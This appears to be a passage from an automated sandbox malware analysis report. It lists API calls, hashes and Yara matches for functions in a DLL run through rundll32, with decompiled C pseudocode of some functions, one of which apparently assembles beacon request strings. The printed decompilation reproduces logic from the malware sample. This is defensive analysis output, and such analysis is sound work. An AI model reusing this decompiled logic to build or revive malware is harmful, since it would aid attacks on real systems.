                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: MemoryQueryVirtual
                                • String ID:
                                • API String ID: 2850889275-0
                                • Opcode ID: c7a783ec40146d7a44a23c556f36583c33bdcaba62c7f8e23bf874221b87b48e
                                • Instruction ID: 511fe8dee85670cb5e2ee682ce53e68c90971c2ed1cff3566805b7a6f9ec44fa
                                • Opcode Fuzzy Hash: c7a783ec40146d7a44a23c556f36583c33bdcaba62c7f8e23bf874221b87b48e
                                • Instruction Fuzzy Hash: 1861C5706406098FDB59CE29C49066AF3E9FF8F354B28846BF856CF394E731D84E8649
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347F2A9 Relevance: 1.5, APIs: 1, Instructions: 38processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateProcessAsUserA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?), ref: 0347F2E3
                                  • Part of subcall function 03485D7A: ResumeThread.KERNEL32(00000004,?,0347F2F7,?), ref: 03485D8F
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateProcessResumeThreadUser
                                • String ID:
                                • API String ID: 3393100766-0
                                • Opcode ID: 1b22d8013917b2d06d6208146acb94799df58eeace35f3d04f27662aa6e2231b
                                • Instruction ID: 92c7899baec83e0e3f9c35703c1904efe0365d49a04708553403cd27709b8342
                                • Opcode Fuzzy Hash: 1b22d8013917b2d06d6208146acb94799df58eeace35f3d04f27662aa6e2231b
                                • Instruction Fuzzy Hash: 15F0FF32215209AFDF029F99DC41CDA7FA9FF5D374B05422AF91896120C732DC21DB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034736BB Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                Download Yara Rule
                                APIs
                                • RtlNtStatusToDosError.NTDLL(00000000), ref: 034736D3
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorStatus
                                • String ID:
                                • API String ID: 1596131371-0
                                • Opcode ID: 449c87d5405e559cb459f67ede550e556bf6434fe41f2abf662d9fe5f6d6d923
                                • Instruction ID: 9a313436f80e7a9bd44e6adac37094219309839d35d57922235cecb1edc3f4ce
                                • Opcode Fuzzy Hash: 449c87d5405e559cb459f67ede550e556bf6434fe41f2abf662d9fe5f6d6d923
                                • Instruction Fuzzy Hash: A2C012365052026BDE59AF50D81892F7B91ABA4350F00441EB14698174C7319450DB04
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03493DB0 Relevance: .1, Instructions: 77COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                                • Instruction ID: 26c15123ba19a7414850156c4db45ea5d7e19f61deb68ed5f27bc00cd0758d9d
                                • Opcode Fuzzy Hash: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                                • Instruction Fuzzy Hash: 8B21927A900204AFDF10EF69C88096BFBA5FF45310B0981AAD9168F245D730FA15C7E0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0343829C Relevance: .1, Instructions: 77COMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 71%
                                			E0343829C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E03438407(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E034384C1(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E034383AC(_t55, _t66);
										_t89 = _t66 + 0x10;
										E03438407(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E034384A3(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                                0x034382a0
                                0x034382a1
                                0x034382a2
                                0x034382a5
                                0x034382a7
                                0x034382aa
                                0x034382ab
                                0x034382ad
                                0x034382ae
                                0x034382af
                                0x034382b2
                                0x034382bc
                                0x0343836d
                                0x03438374
                                0x0343837d
                                0x034382c2
                                0x034382c2
                                0x034382c8
                                0x034382ce
                                0x034382d1
                                0x034382d4
                                0x034382d8
                                0x034382dd
                                0x034382e2
                                0x03438362
                                0x00000000
                                0x034382e4
                                0x034382e4
                                0x034382f0
                                0x034382f2
                                0x0343834d
                                0x0343834d
                                0x03438353
                                0x00000000
                                0x034382f4
                                0x03438303
                                0x03438305
                                0x03438306
                                0x03438307
                                0x0343830a
                                0x0343830a
                                0x0343830c
                                0x00000000
                                0x0343830e
                                0x0343830e
                                0x03438358
                                0x03438310
                                0x03438310
                                0x03438314
                                0x0343831c
                                0x03438321
                                0x03438326
                                0x03438332
                                0x0343833a
                                0x03438341
                                0x03438347
                                0x0343834b
                                0x00000000
                                0x0343834b
                                0x0343830e
                                0x0343830c
                                0x00000000
                                0x034382f2
                                0x03438366
                                0x03438366
                                0x03438366
                                0x034382e2
                                0x03438382
                                0x03438389

                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                • Instruction ID: 03bcc5aad74b06d4be9e122e348c38eb8ddbe8c5a27ee10f46ceebd855b0c1ce
                                • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                • Instruction Fuzzy Hash: 7421D8729002049FCB10DF69C8C086BF7A5FF49320B0A8559E8199F345E731F919CBE1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034737C2 Relevance: 54.4, APIs: 36, Instructions: 424synchronizationtimethreadCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 03485C28: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 03485C5C
                                  • Part of subcall function 03485C28: GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 03485D1D
                                  • Part of subcall function 03485C28: ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 03485D26
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?), ref: 03473860
                                  • Part of subcall function 0347A976: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0347A990
                                  • Part of subcall function 0347A976: CreateWaitableTimerA.KERNEL32(0349A1E8,00000001,?), ref: 0347A9AD
                                  • Part of subcall function 0347A976: GetLastError.KERNEL32(?,00000000,03488C06,00000000,00000000,0000801C,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 0347A9BE
                                  • Part of subcall function 0347A976: GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,03488C06,00000000,00000000,0000801C), ref: 0347A9FE
                                  • Part of subcall function 0347A976: SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,03488C06,00000000,00000000,0000801C), ref: 0347AA1D
                                  • Part of subcall function 0347A976: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,03488C06,00000000,00000000,0000801C), ref: 0347AA33
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?), ref: 034738C3
                                • StrChrA.SHLWAPI(00000000,0000007C,00000040,00000000,00000000,00000000,00000000,00000000), ref: 0347393F
                                • StrTrimA.SHLWAPI(00000000,?), ref: 03473961
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 034739A1
                                  • Part of subcall function 0347F08E: RtlAllocateHeap.NTDLL(00000000,00000010,76CDF730), ref: 0347F0B0
                                  • Part of subcall function 0347F08E: HeapFree.KERNEL32(00000000,00000000,00000038,00000000,00000000,?,?,?,?,03473899,?), ref: 0347F0DE
                                • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 03473A47
                                • CloseHandle.KERNEL32(?), ref: 03473CD6
                                  • Part of subcall function 0347E2E6: WaitForSingleObject.KERNEL32(?,00000000,00000000,?,?,?,03473A69,?), ref: 0347E2F2
                                  • Part of subcall function 0347E2E6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,03473A69,?), ref: 0347E320
                                  • Part of subcall function 0347E2E6: ResetEvent.KERNEL32(?,?,?,?,?,03473A69,?), ref: 0347E33A
                                • WaitForSingleObject.KERNEL32(?,00000000,?), ref: 03473A7C
                                • WaitForSingleObject.KERNEL32(?,00000000), ref: 03473A8B
                                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 03473AB8
                                • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 03473AD2
                                • _allmul.NTDLL(0000003C,00000000,FF676980,000000FF), ref: 03473B1A
                                • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,0000003C,00000000,FF676980,000000FF), ref: 03473B34
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 03473B4A
                                • ReleaseMutex.KERNEL32(?), ref: 03473B67
                                • WaitForSingleObject.KERNEL32(?,00000000), ref: 03473B78
                                • WaitForSingleObject.KERNEL32(?,00000000), ref: 03473B87
                                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 03473BBB
                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 03473BD5
                                • SwitchToThread.KERNEL32 ref: 03473BD7
                                • ReleaseMutex.KERNEL32(?), ref: 03473BE1
                                • WaitForSingleObject.KERNEL32(?,00000000), ref: 03473C1F
                                • WaitForSingleObject.KERNEL32(?,00000000), ref: 03473C2A
                                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 03473C4D
                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 03473C67
                                • SwitchToThread.KERNEL32 ref: 03473C69
                                • ReleaseMutex.KERNEL32(?), ref: 03473C73
                                • WaitForSingleObject.KERNEL32(?,00000000), ref: 03473C88
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 03473CEA
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 03473CF6
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 03473D02
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 03473D0E
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 03473D1A
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 03473D26
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 03473D32
                                • RtlExitUserThread.NTDLL(00000000,?,?,?,?,?,?,?), ref: 03473D41
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Wait$CloseHandleObjectSingle$TimerWaitable$MultipleObjects$HeapMutexRelease_allmul$FreeThread$CreateErrorEventLastSwitchTime$AllocateExitFileOpenResetSystemTrimUser
                                • String ID:
                                • API String ID: 2369282788-0
                                • Opcode ID: 3c835343f69f3c0e0b8b4df45af62cc15ab4c1c091f04c5a9aaefaa524a82b37
                                • Instruction ID: 7c6771ca7ebcc13a99ec6f9366f30944a96eae050e261edd022edd2ad6d25b39
                                • Opcode Fuzzy Hash: 3c835343f69f3c0e0b8b4df45af62cc15ab4c1c091f04c5a9aaefaa524a82b37
                                • Instruction Fuzzy Hash: 74E19F76508305AFDB11EF65CC849AFBBECEB44354F090A2FF595AE2A0D7318C049B96
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348F1C4 Relevance: 43.8, APIs: 29, Instructions: 271memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • RtlAllocateHeap.NTDLL ref: 0348F1E5
                                • GetTickCount.KERNEL32 ref: 0348F1FF
                                • wsprintfA.USER32 ref: 0348F252
                                • QueryPerformanceFrequency.KERNEL32(?), ref: 0348F25E
                                • QueryPerformanceCounter.KERNEL32(?), ref: 0348F269
                                • _aulldiv.NTDLL(?,?,?,?), ref: 0348F27F
                                • wsprintfA.USER32 ref: 0348F295
                                • wsprintfA.USER32 ref: 0348F2AF
                                • wsprintfA.USER32 ref: 0348F2D4
                                • HeapFree.KERNEL32(00000000,?), ref: 0348F2E7
                                • wsprintfA.USER32 ref: 0348F30B
                                • HeapFree.KERNEL32(00000000,?), ref: 0348F31E
                                • wsprintfA.USER32 ref: 0348F358
                                • wsprintfA.USER32 ref: 0348F37C
                                • lstrcat.KERNEL32(?,?), ref: 0348F3B4
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0348F3CE
                                • GetTickCount.KERNEL32 ref: 0348F3DE
                                • RtlEnterCriticalSection.NTDLL(0616C2D0), ref: 0348F3F2
                                • RtlLeaveCriticalSection.NTDLL(0616C2D0), ref: 0348F410
                                • StrTrimA.SHLWAPI(00000000,034953E8,00000000,0616C310), ref: 0348F449
                                • lstrcpy.KERNEL32(00000000,?), ref: 0348F46B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0348F472
                                • lstrcat.KERNEL32(00000000,?), ref: 0348F479
                                • lstrcat.KERNEL32(00000000,?), ref: 0348F480
                                • HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,00000000), ref: 0348F4FA
                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 0348F50C
                                • HeapFree.KERNEL32(00000000,00000000,00000000,0616C310), ref: 0348F51B
                                • HeapFree.KERNEL32(00000000,00000000), ref: 0348F52D
                                • HeapFree.KERNEL32(00000000,?), ref: 0348F53F
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Freewsprintf$lstrcat$AllocateCountCriticalPerformanceQuerySectionTicklstrcpy$CounterEnterFrequencyLeaveTrim_aulldiv
                                • String ID:
                                • API String ID: 4198993012-0
                                • Opcode ID: b5a98971b73f65bcbc729740a4305f8600c15ff1324776f320af71b22daf42c6
                                • Instruction ID: c0abccac21332a5fda0eab8f35d15da0d4dd233b515b700268953bf0898973e1
                                • Opcode Fuzzy Hash: b5a98971b73f65bcbc729740a4305f8600c15ff1324776f320af71b22daf42c6
                                • Instruction Fuzzy Hash: 5EA19771500205AFCB02EFA8EC85E5A7BE8FF59304F15052BF908EE225E735D829DB95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03487AEF Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 389memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(?,00000000,?,?), ref: 03487B51
                                • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 03487BED
                                • lstrcpyn.KERNEL32(00000000,?,?), ref: 03487C02
                                • HeapFree.KERNEL32(00000000,00000000), ref: 03487C1D
                                • StrChrA.SHLWAPI(?,00000020,00000000,?,?,?), ref: 03487D04
                                • StrChrA.SHLWAPI(00000001,00000020), ref: 03487D15
                                • lstrlen.KERNEL32(00000000), ref: 03487D29
                                • memmove.NTDLL(?,?,00000001), ref: 03487D39
                                • lstrlen.KERNEL32(?,00000000,?,?,?), ref: 03487D65
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 03487D8B
                                • memcpy.NTDLL(00000000,?,?), ref: 03487D9F
                                • memcpy.NTDLL(?,?,?), ref: 03487DBF
                                • HeapFree.KERNEL32(00000000,?), ref: 03487DFB
                                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 03487EC1
                                • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,00000001), ref: 03487F09
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateFreelstrlen$memcpy$lstrcpynmemmove
                                • String ID: GET $GET $OPTI$OPTI$POST$PUT
                                • API String ID: 3227826163-647159250
                                • Opcode ID: ed54769e925390e357fc8986e8e49812e00e49f18d76fe3efb0f898dc5cda64e
                                • Instruction ID: 75fa27ddbfe2ed248593ab8b2ee950f1160d4e6540f5eba185aad2914c612e5e
                                • Opcode Fuzzy Hash: ed54769e925390e357fc8986e8e49812e00e49f18d76fe3efb0f898dc5cda64e
                                • Instruction Fuzzy Hash: 28E17A35A00205EFDB15EFA9C894BAEBBB9FF04300F28459AE915AF350D730E951DB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347E627 Relevance: 36.3, APIs: 24, Instructions: 288memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • RtlAllocateHeap.NTDLL ref: 0347E65B
                                • wsprintfA.USER32 ref: 0347E6C5
                                • wsprintfA.USER32 ref: 0347E70B
                                • wsprintfA.USER32 ref: 0347E72C
                                • lstrcat.KERNEL32(00000000,?), ref: 0347E763
                                • wsprintfA.USER32 ref: 0347E784
                                • HeapFree.KERNEL32(00000000,00000000), ref: 0347E79E
                                • wsprintfA.USER32 ref: 0347E7C5
                                • HeapFree.KERNEL32(00000000,?), ref: 0347E7DA
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0347E7F4
                                • RtlEnterCriticalSection.NTDLL(0616C2D0), ref: 0347E815
                                • RtlLeaveCriticalSection.NTDLL(0616C2D0), ref: 0347E82F
                                  • Part of subcall function 0348EA15: lstrlen.KERNEL32(00000000,76CC81D0,?,76C85520,773BEEF0,?,00000000,0347E842,00000000,0616C310), ref: 0348EA40
                                  • Part of subcall function 0348EA15: lstrlen.KERNEL32(?,?,00000000,0347E842,00000000,0616C310), ref: 0348EA48
                                  • Part of subcall function 0348EA15: strcpy.NTDLL ref: 0348EA5F
                                  • Part of subcall function 0348EA15: lstrcat.KERNEL32(00000000,?), ref: 0348EA6A
                                  • Part of subcall function 0348EA15: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,00000000,0347E842,00000000,0616C310), ref: 0348EA87
                                • StrTrimA.SHLWAPI(00000000,034953E8,00000000,0616C310), ref: 0347E864
                                  • Part of subcall function 03478DC7: lstrlen.KERNEL32(06168560,76C85520,76CC81D0,773BEEF0,0347E873,?), ref: 03478DD7
                                  • Part of subcall function 03478DC7: lstrlen.KERNEL32(?), ref: 03478DDF
                                  • Part of subcall function 03478DC7: lstrcpy.KERNEL32(00000000,06168560), ref: 03478DF3
                                  • Part of subcall function 03478DC7: lstrcat.KERNEL32(00000000,?), ref: 03478DFE
                                • lstrcpy.KERNEL32(?,?), ref: 0347E88D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0347E897
                                • lstrcat.KERNEL32(00000000,?), ref: 0347E8A2
                                • lstrcat.KERNEL32(00000000,?), ref: 0347E8A9
                                • RtlEnterCriticalSection.NTDLL(0616C2D0), ref: 0347E8B4
                                • RtlLeaveCriticalSection.NTDLL(0616C2D0), ref: 0347E8D0
                                  • Part of subcall function 03477DF5: memcpy.NTDLL(?,?,00000010,?,?,?,?,?,?,?,?,?,?,03485583,00000000,00000000), ref: 03477E46
                                  • Part of subcall function 03477DF5: memcpy.NTDLL(00000000,00000000,?,0000011F), ref: 03477ED9
                                • HeapFree.KERNEL32(00000000,?,00000001,0616C310,?,?,?), ref: 0347E997
                                • HeapFree.KERNEL32(00000000,?,?), ref: 0347E9AF
                                • HeapFree.KERNEL32(00000000,?,00000000,0616C310), ref: 0347E9BD
                                • HeapFree.KERNEL32(00000000,00000000), ref: 0347E9CB
                                • HeapFree.KERNEL32(00000000,00000000), ref: 0347E9D6
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Free$lstrcatwsprintf$CriticalSectionlstrlen$lstrcpy$AllocateEnterLeaveTrimmemcpy$strcpy
                                • String ID:
                                • API String ID: 4032678529-0
                                • Opcode ID: f2d7ba11b31d7d5bdfaa59df7d11b6409775551995dad08328ac1aaeec5b1ff5
                                • Instruction ID: 7ee201c728688f0e2d7bc3e2af004a12df6444ee8365a617ddb2666cf3bae02b
                                • Opcode Fuzzy Hash: f2d7ba11b31d7d5bdfaa59df7d11b6409775551995dad08328ac1aaeec5b1ff5
                                • Instruction Fuzzy Hash: E4B18572104201AFDB11EF69EC80E5A7BE9EF99300F0A056AF948EF260D735E855CF55
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0343300E Relevance: 36.3, APIs: 24, Instructions: 266memorystringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 75%
                                			E0343300E(long __eax, intOrPtr _a4, void* _a8, void* _a16, void* _a20, void* _a24, intOrPtr _a32, void* _a40, intOrPtr _a44) {
				intOrPtr _v4;
				signed int _v8;
				int* _v12;
				char* _v16;
				intOrPtr _v20;
				void* _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				void* __ebx;
				void* __edi;
				long _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t71;
				void* _t74;
				intOrPtr _t75;
				int _t78;
				intOrPtr _t79;
				int _t82;
				intOrPtr _t83;
				intOrPtr _t84;
				void* _t86;
				void* _t89;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr* _t99;
				int* _t105;
				int* _t115;
				char** _t117;
				char* _t118;
				intOrPtr* _t123;
				intOrPtr* _t125;
				intOrPtr* _t127;
				intOrPtr* _t129;
				intOrPtr _t132;
				intOrPtr _t136;
				int _t139;
				intOrPtr _t141;
				int _t144;
				void* _t145;
				intOrPtr _t159;
				void* _t161;
				int _t162;
				void* _t163;
				void* _t164;
				long _t165;
				intOrPtr* _t166;
				intOrPtr* _t167;
				intOrPtr _t168;
				intOrPtr* _t171;
				char** _t174;
				char** _t176;
				char** _t177;
				void* _t182;

				_t66 = __eax;
				_t174 =  &_v16;
				_t145 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t66 = GetTickCount();
				}
				_t67 =  *0x343a018; // 0x95dc214e
				asm("bswap eax");
				_t68 =  *0x343a014; // 0x3a87c8cd
				asm("bswap eax");
				_t69 =  *0x343a010; // 0xd8d2f808
				asm("bswap eax");
				_t70 =  *0x343a00c; // 0x81762942
				asm("bswap eax");
				_t71 =  *0x343a348; // 0x21ad5a8
				_t3 = _t71 + 0x343b62b; // 0x74666f73
				_t162 = wsprintfA(_t145, _t3, 3, 0x3d175, _t70, _t69, _t68, _t67,  *0x343a02c,  *0x343a004, _t66);
				_t74 = E03436927();
				_t75 =  *0x343a348; // 0x21ad5a8
				_t4 = _t75 + 0x343b66b; // 0x74707526
				_t78 = wsprintfA(_t162 + _t145, _t4, _t74);
				_t176 =  &(_t174[0xe]);
				_t163 = _t162 + _t78;
				if(_a24 != 0) {
					_t141 =  *0x343a348; // 0x21ad5a8
					_t8 = _t141 + 0x343b676; // 0x732526
					_t144 = wsprintfA(_t163 + _t145, _t8, _a24);
					_t176 =  &(_t176[3]);
					_t163 = _t163 + _t144;
				}
				_t79 =  *0x343a348; // 0x21ad5a8
				_t10 = _t79 + 0x343b78e; // 0x55e8d36
				_t182 = _a20 - _t10;
				_t12 = _t79 + 0x343b2de; // 0x74636126
				_t157 = 0 | _t182 == 0x00000000;
				_t82 = wsprintfA(_t163 + _t145, _t12, _t182 == 0);
				_t177 =  &(_t176[3]);
				_t164 = _t163 + _t82;
				_t83 = E034322D7(_t10);
				_a32 = _t83;
				if(_t83 != 0) {
					_t136 =  *0x343a348; // 0x21ad5a8
					_t17 = _t136 + 0x343b8d0; // 0x736e6426
					_t139 = wsprintfA(_t164 + _t145, _t17, _t83);
					_t177 =  &(_t177[3]);
					_t164 = _t164 + _t139;
					HeapFree( *0x343a2d8, 0, _a40);
				}
				_t84 = E03432A11();
				_a32 = _t84;
				if(_t84 != 0) {
					_t132 =  *0x343a348; // 0x21ad5a8
					_t21 = _t132 + 0x343b8d8; // 0x6f687726
					wsprintfA(_t164 + _t145, _t21, _t84);
					_t177 =  &(_t177[3]);
					HeapFree( *0x343a2d8, 0, _a40);
				}
				_t159 =  *0x343a3cc; // 0x55e95b0
				_t86 = E03432509(0x343a00a, _t159 + 4);
				_t165 = 0;
				_a16 = _t86;
				if(_t86 == 0) {
					L28:
					HeapFree( *0x343a2d8, _t165, _t145);
					return _a44;
				} else {
					_t89 = RtlAllocateHeap( *0x343a2d8, 0, 0x800);
					_a24 = _t89;
					if(_t89 == 0) {
						L27:
						HeapFree( *0x343a2d8, _t165, _a8);
						goto L28;
					}
					E03431BE9(GetTickCount());
					_t93 =  *0x343a3cc; // 0x55e95b0
					__imp__(_t93 + 0x40);
					asm("lock xadd [eax], ecx");
					_t97 =  *0x343a3cc; // 0x55e95b0
					__imp__(_t97 + 0x40);
					_t99 =  *0x343a3cc; // 0x55e95b0
					_t161 = E03431D33(1, _t157, _t145,  *_t99);
					asm("lock xadd [eax], ecx");
					if(_t161 == 0) {
						L26:
						HeapFree( *0x343a2d8, _t165, _a16);
						goto L27;
					}
					StrTrimA(_t161, 0x343928c);
					_push(_t161);
					_t105 = E0343393C();
					_v12 = _t105;
					if(_t105 == 0) {
						L25:
						HeapFree( *0x343a2d8, _t165, _t161);
						goto L26;
					}
					_t166 = __imp__;
					 *_t166(_t161, _a8);
					 *_t166(_a4, _v12);
					_t167 = __imp__;
					 *_t167(_v4, _v24);
					_t168 = E034361FC( *_t167(_v12, _t161), _v20);
					_v36 = _t168;
					if(_t168 == 0) {
						_v8 = 8;
						L23:
						E0343561E();
						L24:
						HeapFree( *0x343a2d8, 0, _v40);
						_t165 = 0;
						goto L25;
					}
					_t115 = E034310B7(_t145, 0xffffffffffffffff, _t161,  &_v24);
					_v12 = _t115;
					if(_t115 == 0) {
						_t171 = _v24;
						_v20 = E03435B9D(_t171, _t168, _v16, _v12);
						_t123 =  *((intOrPtr*)(_t171 + 8));
